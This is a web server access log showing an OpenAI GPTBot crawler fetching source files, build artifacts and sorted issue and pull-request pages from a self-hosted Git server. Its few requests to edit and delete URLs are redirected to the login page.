"https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.AssemblyInfoInputs.cache" -[17/Feb/2026:19:38:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_delete/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.AssemblyInfoInputs.cache" -[17/Feb/2026:19:38:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.AssemblyInfo.cs" [Client 74.7.227.38] [Length 11283] [Gzip 4.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.AssemblyInfo.cs" -[17/Feb/2026:19:38:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc?display=source" [Client 74.7.227.38] [Length 30117] [Gzip 12.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" -[17/Feb/2026:19:38:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc?display=rendered" [Client 74.7.227.38] [Length 11211] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" -[17/Feb/2026:19:38:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10060] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&state=open&type=all" -[17/Feb/2026:19:38:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10164] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&state=all&type=all" -[17/Feb/2026:19:38:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10161] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&state=all&type=all" -[17/Feb/2026:19:38:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&milestone=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10005] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&milestone=-1&state=all&type=all" -[17/Feb/2026:19:38:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&milestone=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10007] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&milestone=-1&state=all&type=all" -[17/Feb/2026:19:38:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&milestone=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10182] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&milestone=-1&state=all&type=all" -[17/Feb/2026:19:38:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&milestone=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10174] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&milestone=-1&state=all&type=all" -[17/Feb/2026:19:38:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10197] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&project=-1&sort=mostcomment&state=open&type=all" -[17/Feb/2026:19:38:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod01_archive.pyc?display=rendered" [Client 74.7.227.38] [Length 11212] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod01_archive.pyc" -[17/Feb/2026:19:38:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod02_importers.pyc?display=rendered" [Client 74.7.227.38] [Length 11215] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod02_importers.pyc" -[17/Feb/2026:19:38:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10012] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=mostcomment&state=closed&type=all" -[17/Feb/2026:19:38:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10168] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&state=all&type=all" -[17/Feb/2026:19:38:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10165] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&state=all&type=all" -[17/Feb/2026:19:38:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10010] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&project=-1&sort=oldest&state=closed&type=all" -[17/Feb/2026:19:38:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10199] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=mostcomment&state=closed&type=all" -[17/Feb/2026:19:38:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10012] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:38:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 9998] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&state=all&type=all" -[17/Feb/2026:19:38:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10001] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&state=all&type=all" -[17/Feb/2026:19:38:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 9995] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&state=all&type=all" -[17/Feb/2026:19:38:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 9995] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&state=all&type=all" -[17/Feb/2026:19:38:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 9967] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&state=all&type=all" -[17/Feb/2026:19:38:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 9964] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&state=all&type=all" -[17/Feb/2026:19:38:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10165] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&state=all&type=all" -[17/Feb/2026:19:38:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10172] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&state=all&type=all" -[17/Feb/2026:19:38:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10175] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&state=all&type=all" -[17/Feb/2026:19:38:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 9998] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&state=all&type=all" -[17/Feb/2026:19:38:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10162] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&state=all&type=all" -[17/Feb/2026:19:38:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10005] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&state=all&type=all" -[17/Feb/2026:19:38:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10165] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&state=all&type=all" -[17/Feb/2026:19:38:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10170] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&state=all&type=all" -[17/Feb/2026:19:38:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10168] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&state=all&type=all" -[17/Feb/2026:19:38:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?milestone=-1&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 9976] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:38:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?milestone=-1&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 9944] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:38:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?milestone=-1&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 9997] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:38:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?milestone=-1&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10006] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:38:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?milestone=-1&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10152] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:38:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?milestone=-1&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 9977] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:38:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10193] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:19:38:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10187] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&state=all&type=all" -[17/Feb/2026:19:38:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10184] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&state=all&type=all" -[17/Feb/2026:19:38:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10184] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&state=all&type=all" -[17/Feb/2026:19:38:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10187] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&state=all&type=all" -[17/Feb/2026:19:38:42 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod04_pywin32.pyc" -[17/Feb/2026:19:38:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod04_pywin32.pyc" -[17/Feb/2026:19:38:42 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod04_pywin32.pyc" -[17/Feb/2026:19:38:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod04_pywin32.pyc" -[17/Feb/2026:19:38:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/.vscode/tasks.json?display=rendered" [Client 74.7.227.38] [Length 11005] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/.vscode/tasks.json" -[17/Feb/2026:19:38:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10196] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:19:38:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/libcomm_core.so?display=rendered" [Client 74.7.227.38] [Length 11247] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/libcomm_core.so" -[17/Feb/2026:19:38:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/.vscode/tasks.json?display=rendered" [Client 74.7.227.38] [Length 11007] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/.vscode/tasks.json" -[17/Feb/2026:19:38:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode/query.json?display=source" [Client 74.7.227.38] [Length 11368] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode/query.json" -[17/Feb/2026:19:38:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode/query.json?display=rendered" [Client 74.7.227.38] [Length 11155] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode/query.json" -[17/Feb/2026:19:38:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/warn-GoldMonitor_V5.3.txt?display=source" [Client 74.7.227.38] [Length 13808] [Gzip 3.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/warn-GoldMonitor_V5.3.txt" -[17/Feb/2026:19:38:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/warn-GoldMonitor_V5.2.txt?display=source" [Client 74.7.227.38] [Length 14095] [Gzip 3.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 